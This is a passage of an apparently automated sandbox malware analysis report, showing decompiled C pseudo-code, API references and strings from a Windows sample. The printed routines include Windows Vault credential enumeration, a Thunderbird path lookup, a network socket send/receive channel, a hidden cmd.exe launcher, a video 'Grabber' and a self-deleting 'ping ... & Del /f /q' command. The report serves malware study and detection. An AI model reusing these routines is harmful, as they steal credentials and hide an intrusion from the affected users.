                                      				return CloseHandle(_t173);
                                      			}







































                                      0x00408611
                                      0x00408629
                                      0x0040862e
                                      0x0040864a
                                      0x0040864e
                                      0x00408657
                                      0x0040865c
                                      0x0040865f
                                      0x00408664
                                      0x0040866b
                                      0x00408674
                                      0x0040867b
                                      0x0040868b
                                      0x00408694
                                      0x0040869e
                                      0x004086a1
                                      0x004086a6
                                      0x004086a8
                                      0x004086ad
                                      0x004086af
                                      0x004086b2
                                      0x0040889d
                                      0x004088a0
                                      0x004088a8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004086b8
                                      0x004086b8
                                      0x004086b8
                                      0x004086bb
                                      0x004086be
                                      0x004086c0
                                      0x00000000
                                      0x00000000
                                      0x004086c6
                                      0x004086c9
                                      0x00000000
                                      0x00000000
                                      0x004086cf
                                      0x004086d2
                                      0x004086d3
                                      0x004086d5
                                      0x00408774
                                      0x00408779
                                      0x00000000
                                      0x00000000
                                      0x0040877b
                                      0x00408780
                                      0x00000000
                                      0x00000000
                                      0x00408782
                                      0x00408787
                                      0x00000000
                                      0x00000000
                                      0x00408789
                                      0x0040878e
                                      0x00000000
                                      0x00000000
                                      0x00408790
                                      0x00408795
                                      0x00000000
                                      0x00000000
                                      0x00408797
                                      0x0040879c
                                      0x00000000
                                      0x00000000
                                      0x0040879e
                                      0x004087a3
                                      0x00000000
                                      0x00000000
                                      0x004087a5
                                      0x004087aa
                                      0x004087bb
                                      0x004087c0
                                      0x004087c3
                                      0x004087c4
                                      0x004087c7
                                      0x004087cc
                                      0x004087cf
                                      0x004087d1
                                      0x004087d3
                                      0x004087ed
                                      0x004087ed
                                      0x004087f4
                                      0x004087f7
                                      0x004087fa
                                      0x004087fd
                                      0x00408800
                                      0x00408805
                                      0x0040880b
                                      0x00408820
                                      0x00408828
                                      0x0040883d
                                      0x00408845
                                      0x00408852
                                      0x00408862
                                      0x0040886a
                                      0x00408878
                                      0x00408880
                                      0x00408888
                                      0x00408890
                                      0x00408898
                                      0x00000000
                                      0x00408898
                                      0x004087d5
                                      0x004087d5
                                      0x004087d7
                                      0x004087d7
                                      0x004087da
                                      0x004087da
                                      0x004087dc
                                      0x00000000
                                      0x00000000
                                      0x004087de
                                      0x004087e0
                                      0x00000000
                                      0x00000000
                                      0x004087e2
                                      0x004087e5
                                      0x004087e6
                                      0x004087e7
                                      0x004087e9
                                      0x004087eb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004087eb
                                      0x00000000
                                      0x004087da
                                      0x00000000
                                      0x004087aa
                                      0x004086db
                                      0x004086de
                                      0x00000000
                                      0x00000000
                                      0x004086e4
                                      0x004086e9
                                      0x00000000
                                      0x00000000
                                      0x004086ef
                                      0x004086f4
                                      0x00000000
                                      0x00000000
                                      0x004086fa
                                      0x004086ff
                                      0x00000000
                                      0x00000000
                                      0x00408705
                                      0x0040870a
                                      0x00000000
                                      0x00000000
                                      0x00408710
                                      0x00408715
                                      0x00000000
                                      0x00000000
                                      0x0040871b
                                      0x00408720
                                      0x00000000
                                      0x00000000
                                      0x00408726
                                      0x0040872b
                                      0x00000000
                                      0x00000000
                                      0x0040872d
                                      0x00408732
                                      0x00408735
                                      0x00408736
                                      0x00408739
                                      0x0040873b
                                      0x0040873d
                                      0x00408740
                                      0x00408743
                                      0x00408745
                                      0x00408769
                                      0x0040876c
                                      0x00000000
                                      0x00408770
                                      0x0040874a
                                      0x0040874a
                                      0x0040874c
                                      0x0040874f
                                      0x00408751
                                      0x00408754
                                      0x00408754
                                      0x00408756
                                      0x00000000
                                      0x00000000
                                      0x00408758
                                      0x00408759
                                      0x0040875c
                                      0x0040875d
                                      0x0040875f
                                      0x00408761
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408761
                                      0x00408763
                                      0x00408766
                                      0x00000000
                                      0x004087ac
                                      0x004087ac
                                      0x004087ad
                                      0x004087ad
                                      0x00000000
                                      0x004087b6
                                      0x00408630
                                      0x00000000

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408623
                                      • GetLastError.KERNEL32 ref: 00408630
                                      • CloseHandle.KERNEL32(00000000), ref: 00408637
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00408644
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                      • CloseHandle.KERNEL32(00000000), ref: 0040867B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateErrorLastReadSize
                                      • String ID: Password$Password
                                      • API String ID: 1366138817-7788977
                                      • Opcode ID: 3bc884f5ab4bd542d8a62781b9738e0722c350c62e50e95688bf04f0467a17db
                                      • Instruction ID: 3b10680125b4717c2d2d0c900cc0c68fdfff5759fd1223d8dacc4a1490584684
                                      • Opcode Fuzzy Hash: 3bc884f5ab4bd542d8a62781b9738e0722c350c62e50e95688bf04f0467a17db
                                      • Instruction Fuzzy Hash: E5810475D04245AEEB21EB65CD817EEBB65AF85318F20807FE481772C2CA7D0D42CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040D105: WSAStartup.WS2_32(00000202,?), ref: 0040D122
                                        • Part of subcall function 0040D105: socket.WS2_32(00000002,00000001,00000000), ref: 0040D133
                                        • Part of subcall function 0040D105: gethostbyname.WS2_32(?), ref: 0040D141
                                        • Part of subcall function 0040D105: htons.WS2_32(?), ref: 0040D167
                                        • Part of subcall function 0040D105: connect.WS2_32(00000000,?,00000010), ref: 0040D17A
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0040CEF8
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0040CF0D
                                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 0040CF20
                                      • htons.WS2_32(?), ref: 0040CF2E
                                      • recv.WS2_32(00000000,?,00000004,00000000), ref: 0040CF44
                                      • wsprintfA.USER32 ref: 0040CF93
                                      • recv.WS2_32(00000000,?,000000FF,00000000), ref: 0040CFAB
                                        • Part of subcall function 0040D01D: send.WS2_32(00000000,?,00000001,00000000), ref: 0040D03C
                                        • Part of subcall function 0040D01D: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0040D051
                                        • Part of subcall function 0040D01D: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0040D066
                                        • Part of subcall function 0040D07E: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0040D09B
                                        • Part of subcall function 0040D07E: recv.WS2_32(00000000,?,00000800,00000000), ref: 0040D0CF
                                        • Part of subcall function 0040D07E: send.WS2_32(00000000,?,00000000,00000000), ref: 0040D0E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
                                      • String ID: %u.%u.%u.%u
                                      • API String ID: 735718650-1542503432
                                      • Opcode ID: ddc7814d95f667b02328ed0214a1fe7157955ddb27f9a59f17335d7bf1dd7acf
                                      • Instruction ID: 01f61b76f73268f1a0272151d95a6ca4b28235c8cca5bf28ea68f02ea87c1580
                                      • Opcode Fuzzy Hash: ddc7814d95f667b02328ed0214a1fe7157955ddb27f9a59f17335d7bf1dd7acf
                                      • Instruction Fuzzy Hash: 5241B97160420666D714AAB98C85FBB76CD9FC8348F00053BF994E71D1DA78C90BA7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E0040F628() {
                                      				void* _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v100;
                                      				int _t10;
                                      				void* _t23;
                                      				int _t24;
                                      				CHAR* _t26;
                                      
                                      				_v8 = 0;
                                      				_t10 = GetCurrentProcess();
                                      				__imp__IsWow64Process(_t10,  &_v8);
                                      				if(_t10 != 0) {
                                      					if(_v8 == 0) {
                                      						_t10 = E0040F7CD(_t23, __eflags);
                                      						__eflags = _t10;
                                      						if(_t10 != 0) {
                                      							_t24 = _t10;
                                      							goto L6;
                                      						}
                                      					} else {
                                      						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                      						GetWindowsDirectoryA(_t26, 0x104);
                                      						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
                                      						E00401052( &_v100, 0, 0x44);
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
                                      						if(_t10 != 0) {
                                      							Sleep(0x3e8);
                                      							_t24 = _v24.dwProcessId;
                                      							L6:
                                      							return E0040F6ED(_t24);
                                      						}
                                      					}
                                      				}
                                      				return _t10;
                                      			}










                                      0x0040f637
                                      0x0040f63a
                                      0x0040f641
                                      0x0040f649
                                      0x0040f652
                                      0x0040f6d8
                                      0x0040f6dd
                                      0x0040f6df
                                      0x0040f6e1
                                      0x00000000
                                      0x0040f6e1
                                      0x0040f658
                                      0x0040f66b
                                      0x0040f673
                                      0x0040f68a
                                      0x0040f699
                                      0x0040f6a3
                                      0x0040f6a7
                                      0x0040f6a8
                                      0x0040f6a9
                                      0x0040f6be
                                      0x0040f6c6
                                      0x0040f6cd
                                      0x0040f6d3
                                      0x0040f6e3
                                      0x00000000
                                      0x0040f6e3
                                      0x0040f6c6
                                      0x0040f652
                                      0x0040f6ec

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00410BF3,?,?,00000000), ref: 0040F63A
                                      • IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0040F641
                                      • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0040F665
                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F673
                                      • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0040F681
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040F6BE
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0040F6CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 3151064845-2003734499
                                      • Opcode ID: 2882fced29533786e486acd91281d48045ef682232ba62fb35eeee5957ff54ce
                                      • Instruction ID: 511c1d3811cfd2c5a386aa843b6faae71961f3a57ed96b5eac9629c749fce73f
                                      • Opcode Fuzzy Hash: 2882fced29533786e486acd91281d48045ef682232ba62fb35eeee5957ff54ce
                                      • Instruction Fuzzy Hash: 261196B2A00208BFE72097B59D4AFEF766CDB04749F004436B705F61D0D6B49D058679
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040ABE2(WCHAR* __ecx, char* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				short _v536;
                                      				char* _t32;
                                      				WCHAR* _t33;
                                      
                                      				_v12 = 0x104;
                                      				_v16 = 1;
                                      				_t32 = __edx;
                                      				_t33 = __ecx;
                                      				E00401052( &_v536, 0, 0x104);
                                      				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                      				lstrcatW( &_v536, _t33);
                                      				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
                                      					return 0;
                                      				}
                                      				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
                                      				RegCloseKey(_v8);
                                      				return 1;
                                      			}









                                      0x0040abf6
                                      0x0040ac00
                                      0x0040ac06
                                      0x0040ac08
                                      0x0040ac0a
                                      0x0040ac1e
                                      0x0040ac2c
                                      0x0040ac4d
                                      0x00000000
                                      0x0040ac75
                                      0x0040ac62
                                      0x0040ac6b
                                      0x00000000

                                      APIs
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
                                      • lstrcatW.KERNEL32 ref: 0040AC2C
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040AC45
                                      • RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
                                      • RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B
                                      Strings
                                      • thunderbird.exe, xrefs: 0040AC24
                                      • Path, xrefs: 0040AC5A
                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040AC18
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                      • API String ID: 3135247354-1374996286
                                      • Opcode ID: 0c3a42d3e5cf8c9301a21b26cd1f184a73bdf1ba72b6752b472d4058f3a7a5c6
                                      • Instruction ID: 29902e718fa4eac5a904a8c2cfc6c8b763e92419dbb19266740fd7d90a2d764c
                                      • Opcode Fuzzy Hash: 0c3a42d3e5cf8c9301a21b26cd1f184a73bdf1ba72b6752b472d4058f3a7a5c6
                                      • Instruction Fuzzy Hash: 4C1121B2A4021DBFEB10EB94DD49FEE7BBCEB14304F104076B609E2190E6B49E54CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E0040FE4F(intOrPtr __ecx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v58;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				void* _v128;
                                      				char _v144;
                                      				intOrPtr _v148;
                                      				char _v216;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t76;
                                      				intOrPtr* _t80;
                                      				signed int _t82;
                                      				intOrPtr* _t89;
                                      				intOrPtr* _t91;
                                      				intOrPtr* _t92;
                                      				intOrPtr* _t93;
                                      				intOrPtr* _t94;
                                      				intOrPtr* _t95;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t98;
                                      				signed int _t103;
                                      				intOrPtr* _t115;
                                      				intOrPtr* _t118;
                                      				void* _t121;
                                      
                                      				_v28 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_v12 = 0;
                                      				_v16 = 0;
                                      				_t118 = 0;
                                      				_v20 = 0;
                                      				_t89 = 0;
                                      				_v24 = 0;
                                      				_t115 = __imp__CoCreateInstance;
                                      				_t63 =  *_t115(0x412380, 0, 1, 0x414694,  &_v24);
                                      				_t91 = _v24;
                                      				if(_t91 == 0) {
                                      					L8:
                                      					_t92 = _v12;
                                      					if(_t92 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      					L10:
                                      					_t93 = _v16;
                                      					if(_t93 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                      						_v16 = _v16 & 0x00000000;
                                      					}
                                      					_t94 = _v20;
                                      					if(_t94 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                      						_v20 = _v20 & 0x00000000;
                                      					}
                                      					_t95 = _v24;
                                      					if(_t95 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                      						_v24 = _v24 & 0x00000000;
                                      					}
                                      					if(_t118 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                      					}
                                      					if(_t89 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                      					}
                                      					__imp__CoUninitialize();
                                      					return _t63;
                                      				}
                                      				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x412360,  &_v16);
                                      				_t96 = _v16;
                                      				if(_t96 == 0) {
                                      					goto L8;
                                      				}
                                      				 *((intOrPtr*)( *_t96 + 4))(_t96);
                                      				_t63 = E00410180(_a4,  &_v12);
                                      				if(_v12 == 0) {
                                      					goto L10;
                                      				}
                                      				_t63 =  *_t115(0x4123d0, 0, 1, 0x414684,  &_v20);
                                      				_t98 = _v20;
                                      				if(_t98 != 0) {
                                      					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
                                      					_t76 = _v20;
                                      					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
                                      					E00401052( &_v144, 0, 0x48);
                                      					_t80 = _v24;
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
                                      					_t63 = E0040FD9D();
                                      					_t118 = _t63;
                                      					if(_t118 != 0) {
                                      						_t63 = E0040FDB9();
                                      						_t89 = _t63;
                                      						if(_t89 != 0) {
                                      							_t103 = _v20;
                                      							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
                                      							if(_t63 >= 0) {
                                      								_t82 = _v24;
                                      								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
                                      								_t105 = _v148;
                                      								_t113 = _v148 + 0x30;
                                      								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                      								E0040FC00( &_v216);
                                      								_t63 = E0041023F(_v28, _t113, _a4, _v64, _v68, _v58);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L8;
                                      			}































                                      0x0040fe5d
                                      0x0040fe61
                                      0x0040fe6a
                                      0x0040fe76
                                      0x0040fe79
                                      0x0040fe7b
                                      0x0040fe7e
                                      0x0040fe80
                                      0x0040fe83
                                      0x0040fe8e
                                      0x0040fe90
                                      0x0040fe95
                                      0x0040ffbf
                                      0x0040ffbf
                                      0x0040ffc4
                                      0x0040ffc9
                                      0x0040ffcc
                                      0x0040ffcc
                                      0x0040ffd0
                                      0x0040ffd0
                                      0x0040ffd5
                                      0x0040ffda
                                      0x0040ffdd
                                      0x0040ffdd
                                      0x0040ffe1
                                      0x0040ffe6
                                      0x0040ffeb
                                      0x0040ffee
                                      0x0040ffee
                                      0x0040fff2
                                      0x0040fff7
                                      0x0040fffc
                                      0x0040ffff
                                      0x0040ffff
                                      0x00410005
                                      0x0041000a
                                      0x0041000a
                                      0x0041000f
                                      0x00410014
                                      0x00410014
                                      0x00410017
                                      0x00410021
                                      0x00410021
                                      0x0040fea7
                                      0x0040fea9
                                      0x0040feae
                                      0x00000000
                                      0x00000000
                                      0x0040feb7
                                      0x0040fec0
                                      0x0040fec8
                                      0x00000000
                                      0x00000000
                                      0x0040fedf
                                      0x0040fee1
                                      0x0040fee6
                                      0x0040fef7
                                      0x0040fefa
                                      0x0040ff08
                                      0x0040ff15
                                      0x0040ff1f
                                      0x0040ff31
                                      0x0040ff34
                                      0x0040ff35
                                      0x0040ff36
                                      0x0040ff3f
                                      0x0040ff40
                                      0x0040ff41
                                      0x0040ff42
                                      0x0040ff45
                                      0x0040ff4b
                                      0x0040ff50
                                      0x0040ff54
                                      0x0040ff59
                                      0x0040ff5e
                                      0x0040ff62
                                      0x0040ff64
                                      0x0040ff6c
                                      0x0040ff71
                                      0x0040ff73
                                      0x0040ff80
                                      0x0040ff83
                                      0x0040ff8b
                                      0x0040ff98
                                      0x0040ffa6
                                      0x0040ffba
                                      0x0040ffba
                                      0x0040ff71
                                      0x0040ff62
                                      0x0040ff54
                                      0x00000000

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040FE61
                                      • CoCreateInstance.OLE32(00412380,00000000,00000001,00414694,0040F990), ref: 0040FE8E
                                      • CoUninitialize.OLE32 ref: 00410017
                                        • Part of subcall function 00410180: CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 004101AE
                                      • CoCreateInstance.OLE32(004123D0,00000000,00000001,00414684,?), ref: 0040FEDF
                                        • Part of subcall function 0040FC00: CoTaskMemFree.OLE32(?), ref: 0040FC0E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 533512943-4200688928
                                      • Opcode ID: 5a671baa9c1524d00839a0b9fd338d9f76540ae48f3672b580aed8eba955ea8c
                                      • Instruction ID: f1388459a11edadffb113e40ffdd4e30d96e7318b79d066ff901b9b48ceb7778
                                      • Opcode Fuzzy Hash: 5a671baa9c1524d00839a0b9fd338d9f76540ae48f3672b580aed8eba955ea8c
                                      • Instruction Fuzzy Hash: 6B515D71A00209AFDB14DFA5C884EAEB7B9FF45305F14407EF915AB2A0CBB99D44CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E004027D9() {
                                      				char _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v92;
                                      				char _v352;
                                      				char _v816;
                                      				char _v817;
                                      				char _v872;
                                      				void* _t63;
                                      				void* _t70;
                                      				void* _t73;
                                      
                                      				_t63 = _t70;
                                      				_t73 = _t63;
                                      				E0040EA1C(_t73 + 0x10);
                                      				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
                                      					TerminateThread( *0x4167b4, 0);
                                      				}
                                      				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
                                      					E0040EB4B(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
                                      					E004033F3( &_v8, _t73 + 0x54);
                                      					E0040EA37(_t73 + 4,  &_v8);
                                      					E004058FB(_v8);
                                      					E0040EA99(_t73 + 4);
                                      				}
                                      				E00401052( &_v92, 0, 0x44);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				GetModuleFileNameA(0,  &_v352, 0x104);
                                      				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
                                      				E0040102C( &_v817, "\"", 1);
                                      				E0040102C( &_v816,  &_v352, E004010D5( &_v352));
                                      				E0040102C(E004010D5( &_v352) + 0x38 +  &_v872, "\"", 2);
                                      				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                      				CloseHandle(_v24.hThread);
                                      				CloseHandle(_v24);
                                      				ExitProcess(0);
                                      			}













                                      0x004027d9
                                      0x0040f02c
                                      0x0040f031
                                      0x0040f03b
                                      0x0040f044
                                      0x0040f044
                                      0x0040f04d
                                      0x0040f061
                                      0x0040f06d
                                      0x0040f078
                                      0x0040f080
                                      0x0040f087
                                      0x0040f087
                                      0x0040f093
                                      0x0040f09d
                                      0x0040f0a1
                                      0x0040f0a7
                                      0x0040f0a8
                                      0x0040f0b1
                                      0x0040f0c5
                                      0x0040f0d9
                                      0x0040f0f9
                                      0x0040f119
                                      0x0040f13b
                                      0x0040f14a
                                      0x0040f14f
                                      0x0040f152

                                      APIs
                                        • Part of subcall function 0040EA1C: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0040EA23
                                      • TerminateThread.KERNEL32(00000000,?,?), ref: 0040F044
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0040F0B1
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040F13B
                                      • CloseHandle.KERNEL32(?), ref: 0040F14A
                                      • CloseHandle.KERNEL32(?), ref: 0040F14F
                                      • ExitProcess.KERNEL32 ref: 0040F152
                                      Strings
                                      • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0040F0BF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                      • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                      • API String ID: 3630425516-84290196
                                      • Opcode ID: 522f34c8e66ef0154c38e8d9f6267e96b0d3810cd2072919aa6d456e6e235132
                                      • Instruction ID: ea1cf96152815c588e947313fc2c57a60d8bf755887a985f2d57d94b4dc982fd
                                      • Opcode Fuzzy Hash: 522f34c8e66ef0154c38e8d9f6267e96b0d3810cd2072919aa6d456e6e235132
                                      • Instruction Fuzzy Hash: BD316FB2900618BBDB11EBA1CD86EDFB77DEB08304F404476B605A2591DB78AE54CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E0040A06B(void* __ecx) {
                                      				struct HINSTANCE__* _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t24;
                                      				void* _t27;
                                      				void* _t45;
                                      
                                      				_t27 = __ecx;
                                      				_t45 = __ecx;
                                      				_t17 = LoadLibraryA("vaultcli.dll");
                                      				 *(_t45 + 0xb8) = _t17;
                                      				_t46 = _t17;
                                      				if(_t17 == 0) {
                                      					L7:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					_push(_t27);
                                      					 *((intOrPtr*)(_t45 + 0x84)) = E0040E579(_t17, "VaultOpenVault", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x88)) = E0040E579( *(_t45 + 0xb8), "VaultCloseVault", _t46);
                                      					_t21 = E0040E579( *(_t45 + 0xb8), "VaultEnumerateItems", _t46);
                                      					_t43 = "VaultGetItem";
                                      					 *((intOrPtr*)(_t45 + 0x8c)) = _t21;
                                      					 *((intOrPtr*)(_t45 + 0x90)) = E0040E579( *(_t45 + 0xb8), "VaultGetItem", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x94)) = E0040E579( *(_t45 + 0xb8), _t43, _t46);
                                      					_t24 = E0040E579( *(_t45 + 0xb8), "VaultFree", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x98)) = _t24;
                                      					if( *((intOrPtr*)(_t45 + 0x84)) == 0 ||  *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x88)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 || _t24 == 0) {
                                      						goto L7;
                                      					} else {
                                      						return 1;
                                      					}
                                      				}
                                      			}








                                      0x0040a06b
                                      0x0040a071
                                      0x0040a073
                                      0x0040a079
                                      0x0040a07f
                                      0x0040a081
                                      0x0040a135
                                      0x0040a135
                                      0x0040a138
                                      0x0040a087
                                      0x0040a088
                                      0x0040a0a0
                                      0x0040a0b6
                                      0x0040a0bc
                                      0x0040a0c7
                                      0x0040a0ce
                                      0x0040a0e1
                                      0x0040a0f7
                                      0x0040a0fd
                                      0x0040a105
                                      0x0040a112
                                      0x00000000
                                      0x0040a130
                                      0x0040a134
                                      0x0040a134
                                      0x0040a112

                                      APIs
                                      • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040A073
                                        • Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadlstrcmp
                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                      • API String ID: 2493137890-3967309459
                                      • Opcode ID: d440007b886b91f492dd60ac605478f67e3e3370c0f7fc5f51ea2ac71965d388
                                      • Instruction ID: 9c86c6a071819a6218a29dbcc43a7c44502138cc7b44748e8cde21c07d479f95
                                      • Opcode Fuzzy Hash: d440007b886b91f492dd60ac605478f67e3e3370c0f7fc5f51ea2ac71965d388
                                      • Instruction Fuzzy Hash: 51111C31A007018FCB649A72A415797B6A6AB84314F108C3FA0EED7390DF38A8A1CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040F1EC(void* __ecx) {
                                      				void* _v8;
                                      				int _v12;
                                      				short* _t16;
                                      
